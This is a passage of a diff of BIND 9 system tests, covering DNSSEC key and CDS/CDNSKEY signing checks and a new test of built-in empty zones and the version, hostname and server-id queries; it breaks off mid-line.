"sync.example.*in.cds.*[1-9][0-9]* " dig.out.ns3.cdstest$n > /dev/null || ret=1 +grep -i "sync.example.*in.cdnskey.*257 " dig.out.ns3.cdnskeytest$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "test 'dnssec-dnskey-kskonly no' affects DNSKEY/CDS/CDNSKEY ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 sync.example dnskey > dig.out.ns3.dnskeytest$n +$DIG $DIGOPTS @10.53.0.3 sync.example cdnskey > dig.out.ns3.cdnskeytest$n +$DIG $DIGOPTS @10.53.0.3 sync.example cds > dig.out.ns3.cdstest$n +lines=$(awk '$4 == "RRSIG" && $5 == "DNSKEY" {print}' dig.out.ns3.dnskeytest$n | wc -l) +test ${lines:-0} -eq 2 || ret=1 +lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.ns3.cdnskeytest$n | wc -l) +test ${lines:-0} -eq 2 || ret=1 +lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.ns3.cdstest$n | wc -l) +test ${lines:-0} -eq 2 || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "test 'dnssec-dnskey-kskonly yes' affects DNSKEY/CDS/CDNSKEY ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 kskonly.example dnskey > dig.out.ns3.dnskeytest$n +$DIG $DIGOPTS @10.53.0.3 kskonly.example cdnskey > dig.out.ns3.cdnskeytest$n +$DIG $DIGOPTS @10.53.0.3 kskonly.example cds > dig.out.ns3.cdstest$n +lines=$(awk '$4 == "RRSIG" && $5 == "DNSKEY" {print}' dig.out.ns3.dnskeytest$n | wc -l) +test ${lines:-0} -eq 1 || ret=1 +lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.ns3.cdnskeytest$n | wc -l) +test ${lines:-0} -eq 1 || ret=1 +lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.ns3.cdstest$n | wc -l) +test ${lines:-0} -eq 1 || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "setting CDS and CDNSKEY deletion times and calling 'rndc loadkeys'" +$SETTIME -D sync now $(cat sync.key) > settime.out.test$n || ret=1 +($RNDCCMD 10.53.0.3 loadkeys sync.example | sed 's/^/ns3 /' | cat_i) || ret=1 + +echo_i "checking that the CDS and CDNSKEY are deleted ($n)" +ret=0 +ensure_cds_and_cdnskey_are_deleted() { + $DIG $DIGOPTS @10.53.0.3 sync.example. CDS > dig.out.ns3.cdstest$n || return 1 + awk '$1 == "sync.example." && $4 == "CDS" { exit 1; }' dig.out.ns3.cdstest$n || return 1 + $DIG $DIGOPTS @10.53.0.3 sync.example. CDNSKEY > dig.out.ns3.cdnskeytest$n || return 1 + awk '$1 == "sync.example." && $4 == "CDNSKEY" { exit 1; }' dig.out.ns3.cdnskeytest$n || return 1 +} +retry 10 ensure_cds_and_cdnskey_are_deleted || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "check that dnssec-settime -p Dsync works ($n)" +ret=0 +$SETTIME -p Dsync $(cat sync.key) > settime.out.test$n || ret=1 +grep "SYNC Delete:" settime.out.test$n >/dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "check that dnssec-settime -p Psync works ($n)" +ret=0 +$SETTIME -p Psync $(cat sync.key) > settime.out.test$n || ret=1 +grep "SYNC Publish:" settime.out.test$n >/dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "check that zone with inactive KSK and active ZSK is properly autosigned ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 axfr inacksk2.example > dig.out.ns3.test$n + +zskid=$(awk '$4 == "DNSKEY" && $5 == 256 { print }' dig.out.ns3.test$n | + $DSFROMKEY -A -2 -f - inacksk2.example | awk '{ print $4}' ) +pattern="DNSKEY ${DEFAULT_ALGORITHM_NUMBER} 2 [0-9]* [0-9]* [0-9]* ${zskid} " +grep "${pattern}" dig.out.ns3.test$n > /dev/null || ret=1 + +kskid=$(awk '$4 == "DNSKEY" && $5 == 257 { print }' dig.out.ns3.test$n | + $DSFROMKEY -2 -f - inacksk2.example | awk '{ print $4}' ) +pattern="DNSKEY ${DEFAULT_ALGORITHM_NUMBER} 2 [0-9]* [0-9]* [0-9]* ${kskid} " +grep "${pattern}" dig.out.ns3.test$n > /dev/null && ret=1 + +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "check that zone with inactive ZSK and active KSK is properly autosigned ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 axfr inaczsk2.example > dig.out.ns3.test$n +grep "SOA ${DEFAULT_ALGORITHM_NUMBER} 2" dig.out.ns3.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# Check that DNSKEY is now signed with the ZSK. +# +echo_i "check that zone with active and inactive KSK and active ZSK is properly" +echo_ic "resigned after the active KSK is deleted - stage 2: Verify that DNSKEY" +echo_ic "is now signed with the ZSK. ($n)" +ret=0 + +$DIG $DIGOPTS @10.53.0.3 axfr inacksk3.example > dig.out.ns3.test$n + +zskid=$(awk '$4 == "DNSKEY" && $5 == 256 { print }' dig.out.ns3.test$n | + $DSFROMKEY -A -2 -f - inacksk3.example | awk '{ print $4}' ) +pattern="DNSKEY ${DEFAULT_ALGORITHM_NUMBER} 2 [0-9]* [0-9]* [0-9]* ${zskid} " +grep "${pattern}" dig.out.ns3.test$n > /dev/null || ret=1 + +count=$(awk 'BEGIN { count = 0 } + $4 == "RRSIG" && $5 == "DNSKEY" { count++ } + END {print count}' dig.out.ns3.test$n) +test $count -eq 1 || ret=1 + +count=$(awk 'BEGIN { count = 0 } + $4 == "DNSKEY" { count++ } + END {print count}' dig.out.ns3.test$n) +test $count -eq 2 || ret=1 + +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# Check that zone is now signed with the KSK. +# +echo_i "check that zone with active and inactive ZSK and active KSK is properly" +echo_ic "resigned after the active ZSK is deleted - stage 2: Verify that zone" +echo_ic "is now signed with the KSK. ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 axfr inaczsk3.example > dig.out.ns3.test$n +kskid=$(awk '$4 == "DNSKEY" && $5 == 257 { print }' dig.out.ns3.test$n | + $DSFROMKEY -2 -f - inaczsk3.example | awk '{ print $4}' ) +grep "CNAME ${DEFAULT_ALGORITHM_NUMBER} 3 [0-9]* [0-9]* [0-9]* ${kskid} " dig.out.ns3.test$n > /dev/null || ret=1 +count=$(awk 'BEGIN { count = 0 } + $4 == "RRSIG" && $5 == "CNAME" { count++ } + END {print count}' dig.out.ns3.test$n) +test $count -eq 1 || ret=1 +count=$(awk 'BEGIN { count = 0 } + $4 == "DNSKEY" { count++ } + END {print count}' dig.out.ns3.test$n) +test $count -eq 2 || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking for out-of-zone NSEC3 records after ZSK removal ($n)" +ret=0 +# Switch the zone over to NSEC3 and wait until the transition is complete. +$RNDCCMD 10.53.0.3 signing -nsec3param 1 1 10 12345678 delzsk.example. > signing.out.1.test$n 2>&1 || ret=1 +for i in 0 1 2 3 4 5 6 7 8 9; do + _ret=1 + $DIG $DIGOPTS delzsk.example NSEC3PARAM @10.53.0.3 > dig.out.ns3.1.test$n 2>&1 || ret=1 + grep "NSEC3PARAM.*12345678" dig.out.ns3.1.test$n > /dev/null 2>&1 + if [ $? -eq 0 ]; then + $RNDCCMD 10.53.0.3 signing -list delzsk.example > signing.out.2.test$n 2>&1 + grep "Creating NSEC3 chain " signing.out.2.test$n > /dev/null 2>&1 + if [ $? -ne 0 ]; then + _ret=0 + break + fi + fi + sleep 1 +done +if [ $_ret -ne 0 ]; then + echo_i "timed out waiting for NSEC3 chain creation" + ret=1 +fi +# Mark the inactive ZSK as pending removal. +file="ns3/$(cat delzsk.key).key" +$SETTIME -D now-1h $file > settime.out.test$n || ret=1 +# Trigger removal of the inactive ZSK and wait until its completion. +($RNDCCMD 10.53.0.3 loadkeys delzsk.example 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1 +for i in 0 1 2 3 4 5 6 7 8 9; do + _ret=1 + $RNDCCMD 10.53.0.3 signing -list delzsk.example > signing.out.3.test$n 2>&1 + grep "Signing " signing.out.3.test$n > /dev/null 2>&1 + if [ $? -ne 0 ]; then + if [ $(grep "Done signing " signing.out.3.test$n | wc -l) -eq 2 ]; then + _ret=0 + break + fi + fi + sleep 1 +done +if [ $_ret -ne 0 ]; then + echo_i "timed out waiting for key removal" + ret=1 +fi +# Check whether key removal caused NSEC3 records to be erroneously created for +# glue records due to a secure delegation already being signed by the active key +# (i.e. a key other than the one being removed but using the same algorithm). +# +# For reference: +# +# $ nsec3hash 12345678 1 10 ns.sub.delzsk.example. +# 589R358VSPJUFVAJU949JPVF74D9PTGH (salt=12345678, hash=1, iterations=10) +# +$DIG $DIGOPTS delzsk.example AXFR @10.53.0.3 > dig.out.ns3.3.test$n || ret=1 +grep "589R358VSPJUFVAJU949JPVF74D9PTGH" dig.out.ns3.3.test$n > /dev/null 2>&1 && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "check that DNAME at apex with NSEC3 is correctly signed (auto-dnssec maintain) ($n)" +ret=0 +$DIG $DIGOPTS txt dname-at-apex-nsec3.example @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "RRSIG NSEC3 ${DEFAULT_ALGORITHM_NUMBER} 3 600" dig.out.ns3.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that DNAME is not treated as a delegation when signing ($n)" +ret=0 +$DIG $DIGOPTS dname-and-txt.secure.example. DNAME @10.53.0.3 > dig.out.ns3.1.test$n || ret=1 +grep "dname-and-txt.secure.example.*RRSIG.*DNAME" dig.out.ns3.1.test$n > /dev/null 2>&1 || ret=1 +$DIG $DIGOPTS dname-and-txt.secure.example. TXT @10.53.0.3 > dig.out.ns3.2.test$n || ret=1 +grep "dname-and-txt.secure.example.*RRSIG.*TXT" dig.out.ns3.2.test$n > /dev/null 2>&1 || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking key maintenance events were logged correctly ($n)" +ret=0 +pub=$(grep "DNSKEY .* is now published" ns1/named.run | wc -l) +[ "$pub" -eq 6 ] || ret=1 +act=$(grep "DNSKEY .* is now active" ns1/named.run | wc -l) +[ "$act" -eq 5 ] || ret=1 +rev=$(grep "DNSKEY .* is now revoked" ns1/named.run | wc -l) +[ "$rev" -eq 1 ] || ret=1 +inac=$(grep "DNSKEY .* is now inactive" ns1/named.run | wc -l) +[ "$inac" -eq 1 ] || ret=1 +del=$(grep "DNSKEY .* is now deleted" ns1/named.run | wc -l) +[ "$del" -eq 1 ] || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that CDS (DELETE) persists after zone sign ($n)" +echo_i "update add cds-delete.example. CDS 0 0 00" +ret=0 +$NSUPDATE > nsupdate.out 2>&1 <<END +server 10.53.0.3 ${PORT} +zone cds-delete.example. +update add cds-delete.example. 3600 CDS 0 0 0 00 +send +END + +_cds_delete() ( + $DIG $DIGOPTS +noall +answer $1 cds @10.53.0.3 > dig.out.ns3.test$n || return 1 + grep "CDS.*0.*0.*0.*00" dig.out.ns3.test$n > /dev/null 2>&1 || return 1 + return 0 +) +_cdnskey_delete_nx() { + $DIG $DIGOPTS +noall +answer $1 cdnskey @10.53.0.3 > dig.out.ns3.test$n || return 1 + grep "CDNSKEY.*0.*3.*0.*AA==" dig.out.ns3.test$n > /dev/null 2>&1 && return 1 + return 0 +} + +echo_i "query cds-delete.example. CDS" +retry_quiet 10 _cds_delete cds-delete.example. || ret=1 +echo_i "query cds-delete.example. CDNSKEY" +retry_quiet 1 _cdnskey_delete_nx cds-delete.example. || ret=1 + +echo_i "sign cds-delete.example." +nextpart ns3/named.run >/dev/null +$RNDCCMD 10.53.0.3 sign cds-delete.example > /dev/null 2>&1 || ret=1 +wait_for_log 10 "zone cds-delete.example/IN: next key event" ns3/named.run +# The CDS (DELETE) record should still be here. +echo_i "query cds-delete.example. CDS" +retry_quiet 1 _cds_delete cds-delete.example. || ret=1 +# The CDNSKEY (DELETE) record should still not be added. +echo_i "query cds-delete.example. CDNSKEY" +retry_quiet 1 _cdnskey_delete_nx cds-delete.example. || ret=1 + +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that CDNSKEY (DELETE) persists after zone sign ($n)" +echo_i "update add cdnskey-delete.example. CDNSKEY 0 3 0 AA==" +ret=0 +$NSUPDATE > nsupdate.out 2>&1 <<END +server 10.53.0.3 ${PORT} +zone cdnskey-delete.example. +update add cdnskey-delete.example. 3600 CDNSKEY 0 3 0 AA== +send +END + +_cds_delete_nx() ( + $DIG $DIGOPTS +noall +answer $1 cds @10.53.0.3 > dig.out.ns3.test$n || return 1 + grep "CDS.*0.*0.*0.*00" dig.out.ns3.test$n > /dev/null 2>&1 && return 1 + return 0 +) +_cdnskey_delete() { + $DIG $DIGOPTS +noall +answer $1 cdnskey @10.53.0.3 > dig.out.ns3.test$n || return 1 + grep "CDNSKEY.*0.*3.*0.*AA==" dig.out.ns3.test$n > /dev/null 2>&1 || return 1 + return 0 +} + +echo_i "query cdnskey-delete.example. CDNSKEY" +retry_quiet 10 _cdnskey_delete cdnskey-delete.example. || ret=1 +echo_i "query cdnskey-delete.example. CDS" +retry_quiet 1 _cds_delete_nx cdnskey-delete.example. || ret=1 + +echo_i "sign cdsnskey-delete.example." +nextpart ns3/named.run >/dev/null +$RNDCCMD 10.53.0.3 sign cdnskey-delete.example > /dev/null 2>&1 || ret=1 +wait_for_log 10 "zone cdnskey-delete.example/IN: next key event" ns3/named.run +# The CDNSKEY (DELETE) record should still be here. +echo_i "query cdnskey-delete.example. CDNSKEY" +retry_quiet 1 _cdnskey_delete cdnskey-delete.example. || ret=1 +# The CDS (DELETE) record should still not be added. +echo_i "query cdnskey-delete.example. CDS" +retry_quiet 1 _cds_delete_nx cdnskey-delete.example. || ret=1 + +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "check removal of ENT NSEC3 records when opt out delegations are removed ($n)" +ret=0 +zone=optout-with-ent +hash=JTR8R6AVFULU0DQH9I6HNN2KUK5956EL +# check that NSEC3 for ENT is present +$DIG $DIGOPTS @10.53.0.2 a "ent.${zone}" > dig.out.pre.ns2.test$n +grep "status: NOERROR" dig.out.pre.ns2.test$n >/dev/null || ret=1 +grep "ANSWER: 0, AUTHORITY: 4, " dig.out.pre.ns2.test$n > /dev/null || ret=1 +grep "^${hash}.${zone}." dig.out.pre.ns2.test$n > /dev/null || ret=1 +# remove first delegation of two delegations, NSEC3 for ENT should remain. +( +echo zone $zone +echo server 10.53.0.2 "$PORT" +echo update del sub1.ent.$zone NS +echo send +) | $NSUPDATE +# check that NSEC3 for ENT is still present +$DIG $DIGOPTS @10.53.0.2 a "ent.${zone}" > dig.out.pre.ns2.test$n +$DIG $DIGOPTS @10.53.0.2 a "ent.${zone}" > dig.out.mid.ns2.test$n +grep "status: NOERROR" dig.out.mid.ns2.test$n >/dev/null || ret=1 +grep "ANSWER: 0, AUTHORITY: 4, " dig.out.mid.ns2.test$n > /dev/null || ret=1 +grep "^${hash}.${zone}." dig.out.mid.ns2.test$n > /dev/null || ret=1 +# remove second delegation of two delegations, NSEC3 for ENT should be deleted. +( +echo zone $zone +echo server 10.53.0.2 "$PORT" +echo update del sub2.ent.$zone NS +echo send +) | $NSUPDATE +# check that NSEC3 for ENT is gone present +$DIG $DIGOPTS @10.53.0.2 a "ent.${zone}" > dig.out.post.ns2.test$n +grep "status: NXDOMAIN" dig.out.post.ns2.test$n >/dev/null || ret=1 +grep "ANSWER: 0, AUTHORITY: 4, " dig.out.post.ns2.test$n > /dev/null || ret=1 +grep "^${hash}.${zone}." dig.out.post.ns2.test$n > /dev/null && ret=1 +$DIG $DIGOPTS @10.53.0.2 axfr "${zone}" > dig.out.axfr.ns2.test$n +grep "^${hash}.${zone}." dig.out.axfr.ns2.test$n > /dev/null && ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/builtin/clean.sh b/bin/tests/system/builtin/clean.sh new file mode 100644 index 0000000..1ad33dc --- /dev/null +++ b/bin/tests/system/builtin/clean.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns?/named.run +rm -f ns?/named.memstats +rm -f ns?/named.conf +rm -f rndc.status.ns* +rm -f dig.out.ns* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/builtin/ns1/named.conf.in b/bin/tests/system/builtin/ns1/named.conf.in new file mode 100644 index 0000000..fd6569d --- /dev/null +++ b/bin/tests/system/builtin/ns1/named.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + notify no; +}; diff --git a/bin/tests/system/builtin/ns2/named.conf.in b/bin/tests/system/builtin/ns2/named.conf.in new file mode 100644 index 0000000..3275b06 --- /dev/null +++ b/bin/tests/system/builtin/ns2/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify no; + server-id hostname; +}; diff --git a/bin/tests/system/builtin/ns3/named.conf.in b/bin/tests/system/builtin/ns3/named.conf.in new file mode 100644 index 0000000..acde3a5 --- /dev/null +++ b/bin/tests/system/builtin/ns3/named.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify no; + hostname "this.is.a.test.of.hostname"; + server-id "this.is.a.test.of.server-id"; + version "this is a test of version"; +}; diff --git a/bin/tests/system/builtin/setup.sh b/bin/tests/system/builtin/setup.sh new file mode 100644 index 0000000..57e0575 --- /dev/null +++ b/bin/tests/system/builtin/setup.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf diff --git a/bin/tests/system/builtin/tests.sh b/bin/tests/system/builtin/tests.sh new file mode 100644 index 0000000..416b792 --- /dev/null +++ b/bin/tests/system/builtin/tests.sh @@ -0,0 +1,247 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +emptyzones=" +10.IN-ADDR.ARPA +16.172.IN-ADDR.ARPA +17.172.IN-ADDR.ARPA +18.172.IN-ADDR.ARPA +19.172.IN-ADDR.ARPA +20.172.IN-ADDR.ARPA +21.172.IN-ADDR.ARPA +22.172.IN-ADDR.ARPA +23.172.IN-ADDR.ARPA +24.172.IN-ADDR.ARPA +25.172.IN-ADDR.ARPA +26.172.IN-ADDR.ARPA +27.172.IN-ADDR.ARPA +28.172.IN-ADDR.ARPA +29.172.IN-ADDR.ARPA +30.172.IN-ADDR.ARPA +31.172.IN-ADDR.ARPA +168.192.IN-ADDR.ARPA +64.100.IN-ADDR.ARPA +65.100.IN-ADDR.ARPA +66.100.IN-ADDR.ARPA +67.100.IN-ADDR.ARPA +68.100.IN-ADDR.ARPA +69.100.IN-ADDR.ARPA +70.100.IN-ADDR.ARPA +71.100.IN-ADDR.ARPA +72.100.IN-ADDR.ARPA +73.100.IN-ADDR.ARPA +74.100.IN-ADDR.ARPA +75.100.IN-ADDR.ARPA +76.100.IN-ADDR.ARPA +77.100.IN-ADDR.ARPA +78.100.IN-ADDR.ARPA +79.100.IN-ADDR.ARPA +80.100.IN-ADDR.ARPA +81.100.IN-ADDR.ARPA +82.100.IN-ADDR.ARPA +83.100.IN-ADDR.ARPA +84.100.IN-ADDR.ARPA +85.100.IN-ADDR.ARPA +86.100.IN-ADDR.ARPA +87.100.IN-ADDR.ARPA +88.100.IN-ADDR.ARPA +89.100.IN-ADDR.ARPA +90.100.IN-ADDR.ARPA +91.100.IN-ADDR.ARPA +92.100.IN-ADDR.ARPA +93.100.IN-ADDR.ARPA +94.100.IN-ADDR.ARPA +95.100.IN-ADDR.ARPA +96.100.IN-ADDR.ARPA +97.100.IN-ADDR.ARPA +98.100.IN-ADDR.ARPA +99.100.IN-ADDR.ARPA +100.100.IN-ADDR.ARPA +101.100.IN-ADDR.ARPA +102.100.IN-ADDR.ARPA +103.100.IN-ADDR.ARPA +104.100.IN-ADDR.ARPA +105.100.IN-ADDR.ARPA +106.100.IN-ADDR.ARPA +107.100.IN-ADDR.ARPA +108.100.IN-ADDR.ARPA +109.100.IN-ADDR.ARPA +110.100.IN-ADDR.ARPA +111.100.IN-ADDR.ARPA +112.100.IN-ADDR.ARPA +113.100.IN-ADDR.ARPA +114.100.IN-ADDR.ARPA +115.100.IN-ADDR.ARPA +116.100.IN-ADDR.ARPA +117.100.IN-ADDR.ARPA +118.100.IN-ADDR.ARPA +119.100.IN-ADDR.ARPA +120.100.IN-ADDR.ARPA +121.100.IN-ADDR.ARPA +122.100.IN-ADDR.ARPA +123.100.IN-ADDR.ARPA +124.100.IN-ADDR.ARPA +125.100.IN-ADDR.ARPA +126.100.IN-ADDR.ARPA +127.100.IN-ADDR.ARPA +0.IN-ADDR.ARPA +127.IN-ADDR.ARPA +254.169.IN-ADDR.ARPA +2.0.192.IN-ADDR.ARPA +100.51.198.IN-ADDR.ARPA +113.0.203.IN-ADDR.ARPA +255.255.255.255.IN-ADDR.ARPA +0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.IP6.ARPA +1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.IP6.ARPA +D.F.IP6.ARPA +8.E.F.IP6.ARPA +9.E.F.IP6.ARPA +A.E.F.IP6.ARPA +B.E.F.IP6.ARPA +8.B.D.0.1.0.0.2.IP6.ARPA +EMPTY.AS112.ARPA +HOME.ARPA" + +n=`expr $n + 1` +ret=0 +count=0 +echo_i "Checking expected empty zones were configured ($n)" +for zone in ${emptyzones} +do + grep "automatic empty zone: $zone" ns1/named.run > /dev/null || { + echo_i "failed (empty zone $zone missing)" + ret=1 + } + count=`expr $count + 1` +done +lines=`grep "automatic empty zone: " ns1/named.run | wc -l` +test $count -eq $lines -a $count -eq 99 || { + ret=1; echo_i "failed (count mismatch)"; +} +if [ $ret != 0 ] ; then status=`expr $status + $ret`; fi + +n=`expr $n + 1` +echo_i "Checking that reconfiguring empty zones is silent ($n)" +$RNDCCMD 10.53.0.1 reconfig +ret=0 +grep "automatic empty zone" ns1/named.run > /dev/null || ret=1 +grep "received control channel command 'reconfig'" ns1/named.run > /dev/null || ret=1 +grep "reloading configuration succeeded" ns1/named.run > /dev/null || ret=1 +sleep 1 +grep "zone serial (0) unchanged." ns1/named.run > /dev/null && ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +echo_i "Checking that reloading empty zones is silent ($n)" +rndc_reload ns1 10.53.0.1 +ret=0 +grep "automatic empty zone" ns1/named.run > /dev/null || ret=1 +grep "received control channel command 'reload'" ns1/named.run > /dev/null || ret=1 +grep "reloading configuration succeeded" ns1/named.run > /dev/null || ret=1 +sleep 1 +grep "zone serial (0) unchanged." ns1/named.run > /dev/null && ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +HOST_NAME=`$FEATURETEST --gethostname` +BIND_VERSION_STRING=$($NAMED -V | head -1) +BIND_VERSION=$($NAMED -V | sed -ne 's/^BIND \([^ ]*\).*/\1/p') + +n=`expr $n + 1` +ret=0 +echo_i "Checking that default version works for rndc ($n)" +$RNDCCMD 10.53.0.1 status > rndc.status.ns1.$n 2>&1 +grep -F "version: $BIND_VERSION_STRING" rndc.status.ns1.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that custom version works for rndc ($n)" +$RNDCCMD 10.53.0.3 status > rndc.status.ns3.$n 2>&1 +grep -F "version: $BIND_VERSION_STRING (this is a test of version)" rndc.status.ns3.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that default version works for query ($n)" +$DIG $DIGOPTS +short version.bind txt ch @10.53.0.1 > dig.out.ns1.$n +grep "^\"$BIND_VERSION\"$" dig.out.ns1.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that custom version works for query ($n)" +$DIG $DIGOPTS +short version.bind txt ch @10.53.0.3 > dig.out.ns3.$n +grep "^\"this is a test of version\"$" dig.out.ns3.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that default hostname works for query ($n)" +$DIG $DIGOPTS +short hostname.bind txt ch @10.53.0.1 > dig.out.ns1.$n +grep "^\"$HOST_NAME\"$" dig.out.ns1.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that custom hostname works for query ($n)" +$DIG $DIGOPTS +short hostname.bind txt ch @10.53.0.3 > dig.out.ns3.$n +grep "^\"this.is.a.test.of.hostname\"$" dig.out.ns3.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that default server-id is none for query ($n)" +$DIG $DIGOPTS id.server txt ch 